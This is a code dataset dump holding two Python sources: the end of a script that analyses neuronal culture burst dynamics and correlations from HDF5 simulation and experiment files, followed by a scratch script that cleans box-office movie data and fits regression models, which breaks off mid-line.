\"4_stim1\"] # 2um\n conditions[\"partial_m\"] = [\"1_pre\", \"2_stim2\", \"3_post\", \"4_stim1\"] # 5um\n conditions[\"partial_l\"] = [\"1_pre\", \"2_stim2\", \"3_stim1\"] # 5um wide and higher\n conditions[\"global_s\"] = [\"1_pre\", \"2_stim\", \"3_post\"]\n conditions[\"global_m\"] = [\"1_pre\", \"2_stim\", \"3_post\"]\n conditions[\"global_l\"] = [\"1_pre\", \"2_stim\", \"3_post\"]\n\n elif args.etype == \"sim\":\n # number of axons between modules as layouts\n # first rate gets stimulated \"off\" value assigned, second becomes \"on\"\n # motiviation here was to get similar IEI for all k,\n # which occurs at different levels of noise, depending on k.\n conditions[\"k=5\"] = [\"80.0\", \"90.0\"] # Hz\n conditions[\"k=1\"] = [\"75.0\", \"85.0\"]\n conditions[\"k=10\"] = [\"85.0\", \"92.5\"]\n elif args.etype == \"sim_partial\":\n # for the case where we only stimulate 2 modules instead of uniform\n # noise to all, we need a bit more tweaking below\n conditions[\"k=0\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=1\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=3\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=5\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=10\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=-1\"] = [\"0.0\", \"20.0\"]\n elif args.etype == \"sim_partial_no_inhib\":\n # this is the control for blocked inhibition, we only did that for k=5\n conditions[\"k=3\"] = [\"0.0\", \"20.0\"]\n else:\n raise KeyError(\"type should be 'exp', 'exp_chemical' or 'sim_partial'\")\n\n # ------------------------------------------------------------------------------ #\n # iterate over all combination\n # ------------------------------------------------------------------------------ #\n\n log.info(f\"Reading from {args.input_base}\")\n log.info(f\"Writing to {output_path}\")\n\n for layout in tqdm(conditions.keys(), desc=\"Layouts\"):\n\n dataframes = dict()\n for key in [\n \"bursts\",\n \"isis\",\n \"rij\",\n \"rij_paired\",\n \"mod_rij\",\n \"mod_rij_paired\",\n \"trials\",\n ]:\n dataframes[key] = []\n if \"sim\" in args.etype:\n # we collect the correlation coefficients of synaptic resources for sim\n dataframes[\"drij\"] = []\n\n for cdx, condition in enumerate(\n tqdm(conditions[layout], leave=False, desc=\"Conditions\")\n ):\n\n # depending on the type of experiment, we have different naming conventions\n # where wildcards '*' should be completed\n if \"exp\" in args.etype:\n input_paths = glob.glob(f\"{args.input_base}/{layout}/*\")\n elif args.etype == \"sim\":\n input_paths = glob.glob(\n f\"{args.input_base}/stim=off_{layout}_kin=30_jA=45.0_jG=50.0_jM=15.0_tD=20.0_rate={condition}_rep=*.hdf5\"\n )\n elif args.etype == \"sim_partial\":\n input_paths = glob.glob(\n f\"{args.input_base}/stim=02_{layout}_kin=30_jA=45.0_jG=50.0_jM=15.0_tD=20.0_rate=80.0_stimrate={condition}_rep=*.hdf5\"\n )\n elif args.etype == \"sim_partial_no_inhib\":\n input_paths = glob.glob(\n f\"{args.input_base}/stim=02_{layout}_kin=30_jA=45.0_jG=0.0_jM=15.0_tD=20.0_rate=80.0_stimrate={condition}_rep=*.hdf5\"\n )\n\n log.debug(f\"found {len(input_paths)} files for {layout} {condition}\")\n\n # trials / realizations\n pbar = tqdm(input_paths, desc=\"Files\", leave=False)\n for path in pbar:\n\n trial = os.path.basename(path)\n if \"sim\" in args.etype:\n trial = trial.split(\"rep=\")[-1].split(\".\")[0]\n\n log.info(\"------------\")\n log.info(f\"{args.etype} {layout} {condition} {trial}\")\n pbar.set_description(f\"{args.etype} {layout} {condition} {trial}\")\n log.info(\"------------\")\n\n # for the dataframes, we need to tidy up some labels\n if \"exp\" in args.etype:\n condition_string = condition[2:]\n stimulation_string = \"On\" if condition[0:2] == \"2_\" else \"Off\"\n elif \"sim\" in args.etype:\n condition_string = f\"{condition} Hz\"\n # here we should be a bit more careful, maybe\n stimulation_string = \"On\" if cdx == 1 else \"Off\"\n\n # the path still contains the trial\n h5f = prepare_file(args.etype, condition, path)\n\n # ------------------------------------------------------------------------------ #\n # overview plot\n # ------------------------------------------------------------------------------ #\n\n # plot overview panels for experiments\n if \"exp\" in args.etype:\n os.makedirs(f\"{output_path}/{layout}/{trial}\", exist_ok=True)\n fig = ph.overview_dynamic(h5f)\n fig.savefig(\n f\"{output_path}/{layout}/{trial}/{condition}_overview.pdf\"\n )\n\n # get a nice zoom in on some bursts\n try:\n max_pos = np.nanargmax(h5f[\"ana.rates.system_level\"])\n max_pos *= h5f[\"ana.rates.dt\"]\n beg = max_pos\n except:\n beg = 0\n beg = np.fmax(0, beg - 10)\n fig.get_axes()[-2].set_xlim(beg, beg + 20)\n fig.savefig(f\"{output_path}/{layout}/{trial}/{condition}_zoom.pdf\")\n plt.close(fig)\n\n # ------------------------------------------------------------------------------ #\n # statistics of bursts\n # ------------------------------------------------------------------------------ #\n\n # we have already done a bunch of analysis in `prepare_file`\n fracs = np.array(h5f[\"ana.bursts.system_level.participating_fraction\"])\n blen = np.array(h5f[\"ana.bursts.system_level.end_times\"]) - np.array(\n h5f[\"ana.bursts.system_level.beg_times\"]\n )\n slen = np.array(\n [len(x) for x in h5f[\"ana.bursts.system_level.module_sequences\"]]\n )\n olen = ah.find_onset_durations(h5f, return_res=True)\n\n # we have num_bursts -1 inter-burst intervals, use time to next burst\n # and last burst gets a nan.\n ibis = h5f[\"ana.ibi.system_level.any_module\"]\n ibis.extend([np.nan] * (len(blen) - len(ibis)))\n\n # propagation delay: how long to go from peak to peak of the module-level\n # population rate\n ah.find_burst_core_delays(h5f)\n delays = np.array(\n [np.mean(x) for x in h5f[\"ana.bursts.system_level.core_delays_mean\"]]\n )\n\n df = pd.DataFrame(\n {\n \"Duration\": blen,\n \"Sequence length\": slen,\n \"Core delay\": delays,\n \"Fraction\": fracs,\n \"Onset duration\": olen,\n \"Inter-burst-interval\": ibis,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"bursts\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # Inter spike intervals\n # ------------------------------------------------------------------------------ #\n\n isis = []\n for mdx, m_id in enumerate(h5f[\"ana.mod_ids\"]):\n m_dc = h5f[\"ana.mods\"][mdx]\n isis.extend(h5f[f\"ana.isi.{m_dc}.all\"])\n\n df = pd.DataFrame(\n {\n \"ISI\": isis,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"isis\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # neuron level correlation coefficients\n # ------------------------------------------------------------------------------ #\n\n # NxN matrix\n neuron_rij = ah.find_rij(\n h5f, which=\"neurons\", time_bin_size=time_bin_size_for_rij\n )\n np.fill_diagonal(neuron_rij, np.nan)\n neuron_rij_flat = neuron_rij.flatten()\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": neuron_rij_flat,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n # just the bunch of all rijs\n dataframes[\"rij\"].append(df)\n neuron_rij_mean = np.nanmean(neuron_rij)\n neuron_rij_median = np.nanmedian(neuron_rij)\n\n # we also want to compare the correlation coefficients for different\n # combinations (\"parings\") of neurons from certain modules\n pair_descriptions = dict()\n pair_descriptions[\"across_groups_0_2\"] = \"within_stim\"\n pair_descriptions[\"across_groups_1_3\"] = \"within_nonstim\"\n pair_descriptions[\"across_groups_0_1\"] = \"across\"\n pair_descriptions[\"across_groups_2_3\"] = \"across\"\n pair_descriptions[\"all\"] = \"all\"\n for pairing in pair_descriptions.keys():\n neuron_rij_paired = ah.find_rij_pairs(\n h5f, rij=neuron_rij, pairing=pairing, which=\"neurons\"\n )\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": neuron_rij_paired,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Pairing\": pair_descriptions[pairing],\n \"Pair ID\": np.arange(len(neuron_rij_paired)),\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"rij_paired\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # module level correlation coefficients\n # ------------------------------------------------------------------------------ #\n\n # 4x4 matrix\n module_rij = ah.find_rij(h5f, which=\"modules\")\n np.fill_diagonal(module_rij, np.nan)\n module_rij_flat = module_rij.flatten()\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": module_rij_flat,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n # just the bunch of all rijs\n dataframes[\"mod_rij\"].append(df)\n module_rij_mean = np.nanmean(module_rij)\n module_rij_median = np.nanmedian(module_rij)\n\n # pair descriptions as above\n for pairing in pair_descriptions.keys():\n module_rij_paired = ah.find_rij_pairs(\n h5f,\n rij=module_rij,\n pairing=pairing,\n which=\"modules\",\n )\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": module_rij_paired,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Pairing\": pair_descriptions[pairing],\n \"Pair ID\": np.arange(len(module_rij_paired)),\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"mod_rij_paired\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # Correlation of the depletion variable, for simulations\n # ------------------------------------------------------------------------------ #\n\n if \"sim\" in args.etype:\n drij = ah.find_rij(h5f, which=\"depletion\")\n np.fill_diagonal(drij, np.nan)\n drij_flat = drij.flatten()\n df = pd.DataFrame(\n {\n \"Depletion rij\": drij_flat,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n # just the bunch of all rijs\n dataframes[\"drij\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # and some summary statistics on the trial level\n # ------------------------------------------------------------------------------ #\n\n fc = ah._functional_complexity(neuron_rij)\n df = pd.DataFrame(\n {\n \"Num Bursts\": [len(blen)],\n \"Mean Neuron Correlation\": [neuron_rij_mean],\n \"Median Neuron Correlation\": [neuron_rij_median],\n \"Mean Module Correlation\": [module_rij_mean],\n \"Median Module Correlation\": [module_rij_median],\n \"Mean IBI\": [np.nanmean(ibis)],\n \"Median IBI\": [np.nanmedian(ibis)],\n \"Mean Rate\": [np.nanmean(h5f[\"ana.rates.system_level\"])],\n \"Mean Fraction\": [np.nanmean(fracs)],\n \"Median Fraction\": [np.nanmedian(fracs)],\n \"Mean Core delays\": [np.nanmean(delays)],\n \"Median Core delays\": [np.nanmedian(delays)],\n \"Functional Complexity\": [fc],\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n if \"sim\" in args.etype:\n df[\"Mean Depletion rij\"] = np.nanmean(drij)\n df[\"Median Depletion rij\"] = np.nanmedian(drij)\n dataframes[\"trials\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # Finalize, and save a copy of the analyzed file for this trial\n # ------------------------------------------------------------------------------ #\n\n if \"exp\" in args.etype and save_analysed_h5f:\n bnb.hi5.recursive_write(\n filename=(\n f\"{output_path}/{layout}/{trial}/{condition}_analyzed.hdf5\"\n ),\n h5_data=h5f,\n )\n\n bnb.hi5.close_hot()\n del h5f\n\n # for every layout, join list of dataframes and save\n for key in dataframes.keys():\n dataframes[key] = pd.concat(dataframes[key], ignore_index=True)\n if key == \"isis\":\n dataframes[key][\"logISI\"] = dataframes[key].apply(\n lambda row: np.log10(row[\"ISI\"]), axis=1\n )\n\n # for the simulations we append a suffix because layotus `k=...` are not unique.\n if \"sim\" in args.etype:\n suffix = args.etype[3:]\n else:\n suffix = \"\"\n\n meta_data = dict()\n meta_data[\"remove_null_sequences\"] = remove_null_sequences\n meta_data[\"time_bin_size_for_rij\"] = time_bin_size_for_rij\n meta_data[\"bs_large\"] = bs_large(args.etype)\n meta_data[\"threshold_factor\"] = threshold_factor(args.etype)\n meta_data[\"etype\"] = args.etype\n meta_data[\"created\"] = datetime.datetime.now().isoformat()\n meta_data[\"input_base\"] = args.input_base\n meta_data[\"output_path\"] = output_path\n meta_data[\"save_analysed_h5f\"] = save_analysed_h5f\n\n dict_of_dfs_to_hdf5(dataframes, f\"{output_path}/{layout}{suffix}.hdf5\", meta_data)\n\n\n# ------------------------------------------------------------------------------ #\n# helpers\n# ------------------------------------------------------------------------------ #\n\n\ndef prepare_file(etype, condition, path_prefix):\n if \"exp\" in etype:\n h5f = ah.load_experimental_files(\n path_prefix=f\"{path_prefix}/\", condition=condition\n )\n elif \"sim\" in etype:\n h5f = ah.prepare_file(path_prefix)\n\n ah.find_rates(h5f, bs_large=bs_large(etype))\n ah.find_system_bursts_from_global_rate(\n h5f,\n rate_threshold=threshold_factor(etype) * np.nanmax(h5f[\"ana.rates.system_level\"]),\n merge_threshold=0.1,\n skip_sequences=False,\n )\n\n # this is a global setting for now\n if remove_null_sequences:\n ah.remove_bursts_with_sequence_length_null(h5f)\n\n ah.find_ibis(h5f)\n ah.find_participating_fraction_in_bursts(h5f)\n ah.find_isis(h5f)\n\n return h5f\n\n\ndef dict_of_dfs_to_hdf5(df_dict, df_path, meta=dict()):\n os.makedirs(os.path.dirname(df_path), exist_ok=True)\n for key in df_dict.keys():\n df = df_dict[key]\n df.to_hdf(df_path, f\"/data/df_{key}\", complevel=6)\n\n # save some metadata\n import h5py\n\n with h5py.File(df_path, \"a\") as f:\n for key in meta.keys():\n f.create_dataset(f\"/meta/{key}\", data=meta[key])\n\n\nif __name__ == \"__main__\":\n with logging_redirect_tqdm():\n main()\n", "repo_name": "pSpitzner/stimulating_modular_cultures", "sub_path": "ana/process_conditions.py", "file_name": "process_conditions.py", "file_ext": "py", "file_size_in_byte": 22538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 34, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 79, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 152, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 170, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 176, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 178, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 182, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 186, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 223, "usage_type": "call"}, {"api_name": "plot_helper.overview_dynamic", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.fmax", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "ana_helper.find_onset_durations", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 258, "usage_type": "attribute"}, {"api_name": "ana_helper.find_burst_core_delays", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 264, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 267, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 292, "usage_type": "call"}, {"api_name": "ana_helper.find_rij", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 311, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 325, "usage_type": "call"}, {"api_name": "ana_helper.find_rij_pairs", "line_number": 336, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 345, "usage_type": "call"}, {"api_name": "ana_helper.find_rij", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 358, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 372, "usage_type": "call"}, {"api_name": "ana_helper.find_rij_pairs", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 388, "usage_type": "call"}, {"api_name": "ana_helper.find_rij", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 401, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 403, "usage_type": "call"}, {"api_name": "ana_helper._functional_complexity", "line_number": 419, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 430, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 432, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 443, "usage_type": "call"}, {"api_name": "bitsandbobs.hi5.recursive_write", "line_number": 451, "usage_type": "call"}, {"api_name": "bitsandbobs.hi5", "line_number": 451, "usage_type": "attribute"}, {"api_name": "bitsandbobs.hi5.close_hot", "line_number": 458, "usage_type": "call"}, {"api_name": "bitsandbobs.hi5", "line_number": 458, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 466, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 481, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 481, "usage_type": "attribute"}, {"api_name": "ana_helper.load_experimental_files", "line_number": 496, "usage_type": "call"}, {"api_name": "ana_helper.prepare_file", "line_number": 500, "usage_type": "call"}, {"api_name": "ana_helper.find_rates", "line_number": 502, "usage_type": "call"}, {"api_name": "ana_helper.find_system_bursts_from_global_rate", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 505, "usage_type": "call"}, {"api_name": "ana_helper.remove_bursts_with_sequence_length_null", "line_number": 512, "usage_type": "call"}, {"api_name": "ana_helper.find_ibis", "line_number": 514, "usage_type": "call"}, {"api_name": "ana_helper.find_participating_fraction_in_bursts", "line_number": 515, "usage_type": "call"}, {"api_name": "ana_helper.find_isis", "line_number": 516, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 530, "usage_type": "call"}, {"api_name": "tqdm.contrib.logging.logging_redirect_tqdm", "line_number": 536, "usage_type": "call"}]} +{"seq_id": "72996166593", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 07 13:27:11 2016\n\n@author: Sarick\n\"\"\"\n\n# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom dateutil.parser import parse\nimport os\nos.chdir(\"C:\\\\Users\\\\Sarick\\\\Documents\\\\Python Scripts\\\\Document_Clustering\")\n#%%\n\nimport re\nr = re.compile(r'%') \nfile = \"finish.csv\"\n#def scrubber(file):\ndf = pd.read_csv(file)\ndf = df[~df[df.columns[4]].duplicated()]\ndf.columns = range(len(df.columns))\ndf.drop([0], axis = 1, inplace = True)\ndf.columns = range(len(df.columns))\ndf.drop([0, 1, 7, 11, 12, 13, 14, 15, 17, 20, 24, 25, 32, 33, 40, 41, 48], axis = 1, inplace = True)\n#GPT = gross per theater\n#TG = total gross\n\ncolumns=['Release Date','Title','Production Budget','Domestic Gross','Worldwide Gross','Genre','Runtime','MPAA','Critic Rating','Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Weekend 4 Rank','Weekend 4 Gross','Weekend 4 Change','Weekend 4 Theaters','Weekend 4 GPT','Weekend 4 TG']\n\n#df.drop([47, 46, 45, 44, 43, 42, 39, 38, 37 ,36, 35, 34], axis = 1, inplace=True)\n\n\ndf.columns = columns\ndf.dropna(inplace=True, thresh = 26) \n#df3 = df2[(df2['Weekend 2 Change'].str.contains('%')) | (df2['Weekend 3 Change'].str.contains('%')) | (df2['Weekend 4 Change'].str.contains('%'))]\n\ndf = df[(df['Weekend 3 Change'].str.contains('%'))]\ndf = df[(df['Weekend 2 Change'].str.contains('%'))]\nfor column in columns:\n try:\n df[column] = df[column].map(lambda x: x.replace(',',''))\n df[column] = df[column].map(lambda x: x.replace('$',''))\n df[column] = df[column].map(lambda x: x.replace('G(Rating', 'G'))\n df[column] = df[column].map(lambda x: x.replace('GG', 'G'))\n df[column] = df[column].map(lambda x: x.replace('n/c', '0'))\n except (AttributeError):\n pass \n\ndf.fillna(0, inplace=True)\n\ndf['Weekend 2 Theaters'] = df['Weekend 2 Theaters'].replace(',','').astype(int)\ndf['Weekend 3 Theaters'] = df['Weekend 3 Theaters'].replace(',','').astype(int)\ndf.drop(['Weekend 4 Theaters'], axis = 1, inplace = True)\ndf.drop(['Weekend 4 Rank','Weekend 4 Gross','Weekend 4 Change','Weekend 4 GPT','Weekend 4 TG'], axis = 1, inplace = True)\n\ndf['Runtime'] = df['Runtime'].map(lambda x: int(str(x).split()[0])) \ndf['MPAA'] = df['MPAA'].map(lambda x: str(x).split()[0])\ndf['Weekend 1 Rank'] = df['Weekend 1 Rank'].map(lambda x: str(x))\ndf['Weekend 2 Change'] = df['Weekend 2 Change'].map(lambda x: int(x.replace('%','')))\ndf['Weekend 3 Change'] = df['Weekend 3 Change'].map(lambda x: int(x.replace('%','')))\ndf['Release Date'] = df['Release Date'].apply(lambda x: parse(str(x)))\ndf.to_csv('thenumbers_5000_scrubbed_v2.csv',index=False)\n#%%\nimport re\ndf = pd.read_csv('thenumbers_5000_scrubbed_v2.csv')\nlist_of_rating = df['Critic Rating'].tolist()\n\ntotal_rating = [] \nfor rating_string in list_of_rating:\n if rating_string == 'nan' or len(rating_string)==0 or re.findall('\\d+%', rating_string)==[]:\n total_rating.append([0,0])\n else:\n list_pair = re.findall('\\d+%',rating_string)\n total_rating.append(list_pair)\n \nfor i in total_rating:\n if len(i)<2:\n a = total_rating.index(i)\n total_rating.remove(i)\n df.drop(a, axis = 0, inplace=True)\n\n \ncritic_rate, audience_rate = zip(*total_rating)\ndf['Critic Rate'] = critic_rate\ndf['Audience Rate'] = audience_rate\ndf.to_csv('thenumbers_5000_scrubbed_v3.csv',index=False) \n\n\ndf['Critic Rate'] = df['Critic Rate'].map(lambda x: int(str(x).replace('%','')))\ndf['Audience Rate'] = df['Audience Rate'].map(lambda x: int(str(x).replace('%','')))\n\n\n#%%\n#Linear Regression\nimport seaborn as sns\nimport numpy as np\n\n#Check Column Types\ndf.columns.to_series().groupby(df.dtypes).groups\n#Finish converting all columns to numeric\ndf[['Production Budget', 'Domestic Gross', 'Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime']]= df[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime']].apply(pd.to_numeric, errors='coerce')\n\n\ndf3 = df[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime', 'Critic Rate', 'Audience Rate']].replace(0 , df[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime', 'Critic Rate', 'Audience Rate']].mean(), inplace = True)\n\n\n#Do thie call below for every variable to fill the dataframe up\ndf['Audience Rate'].replace(0, df['Audience Rate'].mean(), inplace = True)\ndf4 = df.dropna()\ndf4.to_csv(\"movies_5000_zeros_filledv5\")\n#%%\n# -*- coding: utf-8 -*-\n\ndef adj_r2_score(model,y,ypred):\n\tadj = 1 - float(len(y)-1)/(len(y)-len(model.coef_)-1)*(1 - metrics.r2_score(y,ypred))\n\treturn adj\n\ndf = pd.read_csv('movies_5000_zeros_filled.csv')\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\ndf4.drop(['Critic Rating'], axis = 1, inplace = True)\ndf4['MPAA'] = df4['MPAA'].astype(str)\n\ntranslator = {'M/PG':'PG-13','R(Rated':'R','GG(Rating':'G','Open':'G','G(Rating':'G','Not':'PG-13'}\ndf4['MPAA']=df4['MPAA'].replace(translator)\n\ndf4.to_csv('movies_5000_zeros_filledv6')\n\ndf_dummies = pd.get_dummies(df4['Genre'], drop_first=True) \ndf_dummies = pd.concat([df_dummies, pd.get_dummies(df4['MPAA'], drop_first=True)], axis=1)\ndf_regression = df4[['Production Budget', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_regression = pd.concat([df_regression, df_dummies], axis =1, join_axes=[df_regression.index])\n\n\n#Coefficient Plot\n\n\nplt.plot(range(3), [0.494189, 0.512570,0.591596])\nplt.xticks(range(3), ['Weekend 1', 'Weekend 2', 'Weekend 3'])\nplt.ylabel(\"Correlation Coefficient\")\n\n\n\n#Plot of R2\nwidth = .35\nplt.bar(range(4), [0.55459218078608719, 0.64049897239556585, .675,0.856], width)\nplt.xticks(range(4), [ 'Elastic Net+WW','Elastic Net+Domestic','RF + WW', 'RF+Domestic'])\nplt.ylabel(\"R2 Score\")\n\nwidth = .35\nplt.bar(range(4), [0.55459218078608719,0.79389354806433121, 0.71255505295054022, 0.77758631466092465], width, position = 'center')\nplt.xticks(range(4), [ 'G','PG','PG-13', 'R'])\nplt.ylabel(\"R2 Score\")\n\n\n\nX,y = df_regression,df4['Domestic Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nfrom sklearn.linear_model import LinearRegression\nmodel = LinearRegression().fit(X_train, y_train)\ny_pred = model.predict(X_test)\nmetrics.r2_score(y_test, y_pred)\nmetrics.mean_squared_error(y_test, y_pred)\nmodel.coef_\nmodel.residuals_\n\n\n \n\n# build a classifier\nclf = RandomForestRegressor(n_estimators = 100, max_depth = 7, max_features = 11)\nclf.fit(X_train, y_train)\nclf.feature_importances_\n\n\nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\nplt.barh(range(11), clf.feature_importances_)\nplt.yticks(range(11),['Production Budget', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate'])\nplt.xlabel('Importances')\nplt.ylabel('Features')\n\nplt.scatter(df4['Weekend 3 Theaters'], df4['Worldwide 